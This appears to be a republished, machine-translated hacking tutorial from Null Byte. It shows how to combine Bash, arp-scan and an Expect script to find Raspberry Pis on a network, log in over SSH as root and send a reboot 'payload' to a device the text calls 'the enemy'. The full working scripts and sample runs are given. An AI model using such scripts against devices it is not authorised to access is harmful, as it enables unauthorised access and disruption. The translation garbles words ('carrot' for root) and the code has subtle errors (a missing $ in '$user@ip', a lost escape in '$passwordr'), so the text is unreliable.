قالب وردپرس درنا توس
Home / Tips and Tricks / How to automate SSH remote control of computers with expected scripts «Null-byte :: WonderHowTo

How to automate SSH remote control of computers with expected scripts «Null-byte :: WonderHowTo



When you’re getting into automation, Bash scripting is usually the way to go. There are some limitations, however, and one of them is logging into another device such as a Raspberry Pi and automatically running a script. To help in those situations, we’re going to automate the delivery of an SSH payload with an “expected” script.

Bash scripting is more like sticking things together, so it can’t do everything, including predicting and then reacting to certain variables. So we are going to use an “expected” script to log in to our Raspberry Pi and shut it down automatically. We can also tweak the script to pass just about any payload we want to the Pi.

It̵

7;s a pretty great use of an expected script, and there are a lot of different things you can do with it, so know that our guide is just scratching the surface of how to take an expected script and use it to do things that otherwise it would require much more user interaction.

To proceed, you’ll need a Linux computer with something like Kali or Ubuntu – even a Mac will work. You also need the arp scan and expect tools to be installed. On Kali you can do that with apt install arp scan expected, and you’re done.

Step 1: Create the expected script

Expect scripts are usually used in conjunction with Bash scripts to automate certain things, such as scanning a network or delivering a payload. Since the two work so well together, it is possible to automate all kinds of interesting things. Here we are going to disable every Raspberry Pis on the network using default credentials from the network.

Expect is a unique scripting language that emulates keystrokes by responding to expected responses from a local or remote system. Think of Expect as an automated, virtual you.

– Admin Mag

The expected.exp script we’re showing off is included in our trigger.sh script, so we’ll need to create it first. If desired, start a new directory (mkdir) and nano in expect.exp to start the script design. Then copy and paste the script below into it, press Control-X leave, Y to add it to the buffer, and Enter to save the file.

#!/usr/bin/expect -f

set timeout 20

set ip [lindex $argv 0]

set user [lindex $argv 1]

set password [lindex $argv 2]

spawn ssh "$user@ip" "reboot"

expect "assword:"

send "$passwordr";

interact

Step 2: Create the Trigger Bash script

Before we get into what all that does, let’s create trigger.sh, our Bash script. So use in the same directory nano to get a new one trigger.sh File. Copy and paste the following code in it. Touch Control-X leave, Y to add it to the buffer, and Enter to save the file.

#! bin/bash
echo What is the passcode?
read loginpass
expect expect.exp $(arp-scan -l | grep Raspberry | awk '{print $1}') root $loginpass

You can see it starts with the default shebang () and the bin / bashThis forces only the Bash language to be used for the rest of the script.

On the second line we use echo to show the user a prompt that says, “What is the passcode?” We then read whatever the input was and save it as a loginpass variable.

Finally, trigger.sh opens our expect script, to which we essentially pass three variables. As discussed in a previous Bash lesson, the parentheses () mean that everything in it will happen before continuing with the rest of the one-liner commands, and a dollar sign ($) indicates a variable. So whatever the answer to the content in the brackets will be a variable.

So the first part of the equation is that one arp scan is carried out. This sends ARP packets to hosts on the local network and then displays the responses. Thereafter, grep, a command line text search tool, looks at the scan results for the word Raspberry to hunt for Raspberry Pis. The next, awk, another text search tool, looks for the microcontroller’s IP address found in the arp scan and grep, and print prints the final results.

After all that is done, the username will be passed carrot to the Pi, which is the default on Pis. This is somewhat inspired by the Raspberry Hunter, or rpi-hunter, which is something that hunts Pis using standard credentials on the network, tries to log in, and then sends payloads.

Finally, it passes the password to the Pi via the password that the user enters and stores it as the loginpass variable.

Step 3: Run the Trigger Bash script

Now let’s run the script. After it starts, you will be asked for the enemy’s passcode. First, let’s see what happens if we enter the wrong password.

~$ bash trigger.sh

What is the enemy passcode?
kdsjsdgliyea

spawn ssh root@192.168.1.183 reboot
The authenticity of host '192.168.1.183 (192.168.1.183)' can't be established.
ECDSA key fingerprint is SHA256:wG9YqeFrX90eEjV9+APhnxVkA3DduuZ+d9RbypwKFp4E.
Are you sure you want to continue connecting (yes/no)? yes

kdsjsdgliyea
yes
Please type 'yes' or 'no': yes

Warning: Permanently added '192.168.1.183' (ECDSA) to the list of known hosts.
Welcome to meye-16b312e&!
root@192.168.1.183's password:

As you can see, it tried to spawn an SSH script to get it restart command to the Raspberry Pi. As we gave it the wrong password it didn’t work so then we were asked if we wanted to continue which was a “yes”. Then it asks us if we wanted to log in. We said “yes” and it tried to log in to the Raspberry Pi, but couldn’t because it had the wrong password.

Even though it failed, it was still able to find a Raspberry Pi on the network and try to SSH into it. Now let’s see what happens when we have the real password. One thing to be aware of is that when you log in to something via SSH for the first time, it will ask you for confirmation first, and this will likely break the Bash script. Please log in first to make sure it works.

~$ bash trigger.sh

What is the enemy passcode?
starstar

spawn ssh root@192.168.1.234 reboot
root@192.168.1.234's password:
Connection to 192.168.1.234 closed by remote host.

As you can see, it has successfully detected a Raspberry Pi on the network, spawned an SSH session and it restart order. Then it entered the password which was entered as a variable by the user. After logging in, the host closed, causing the Raspberry Pi to reboot and kick us out.

How the expected script works

We’ve detailed the trigger.sh file and what it does, but now let’s take a look at the expected.sh code to see what it does with all of the information passed by the Bash script.

First, it starts with the default shebang (), the usr / bin / expected, and tack f (-fThis only forces the Expect interpreter to be used for the rest of the script.

Then we set a time-out from 20 seconds so that the script times out after that time. Then we have the set ip line, which accepts the first argument passed to expect.sh, which would be the arp scan results in trigger.sh – the Raspberry Pi’s IP address. The lindex $ argv 0 just tells it to look for the first argument passed, and it starts with zero, which is important to remember.

We then have the set user line, which looks for the second argument passed, in this case carrotThen the set a password line looks for the third argument passed, in this case the user password provided to trigger.sh.

Now it starts to get interesting. Expect scripts to be able to spawn processes, and here we spawn an SSH process (spawn ssh) and use the variables in the same way as in Bash. It takes the $ user variable, root, and then add with the $ ip variable, the IP address of the Pi. That’s how it connects to the Pi. Then, as soon as it gets logged in, it issues a restart order.

However, before all of this can happen, we need the expect part of the script, where we’re looking for something that will actually come to us and type the string asswordThat’s funny, but there is a reason why we do that. If it’s a capital “P” or a lowercase “p”, it doesn’t matter, depending on which server it is. It will always ask us for a password. So unless it’s in all caps, which is a bit less likely, we’ll probably be given most of the different ways to ask us for a password.

So what the script does is expect a request or string of text to say “password” or “Password”. When it gets that, it goes ahead and sends the result, which in our case is the password the user typed into our Bash script a long time ago. The Interaction line puts the whole script into play.

You can do a lot with expected scripts

Don’t expect scripts to be interactive, so we have to use Bash scripts to pass information. For example, we cannot have user input directly in this expected script. It’s very annoying that we can’t, so as a result, it works really well to have a Bash script that gathers all the information you need, passes it on to an expected script, and that expects the script to automate something.

In general, expect scripts to be useful for creating chatbots or handling something you expect input for and a response you want to automate. Now, in conjunction with Bash scripts, you can automate all kinds of powerful tools, so this is just a start, and I hope you can use it to create some really interesting automations.

Do you want to start making money as a white hat hacker? Jump-start your hacking career with our 2020 Premium Ethical Hacking Certification Training Bundle from the new Null Byte Shop and get over 60 hours of training from cybersecurity professionals.

Buy now (90% discount)>

Other valuable deals to check out:

Cover photo by Retia / Null byte

Source link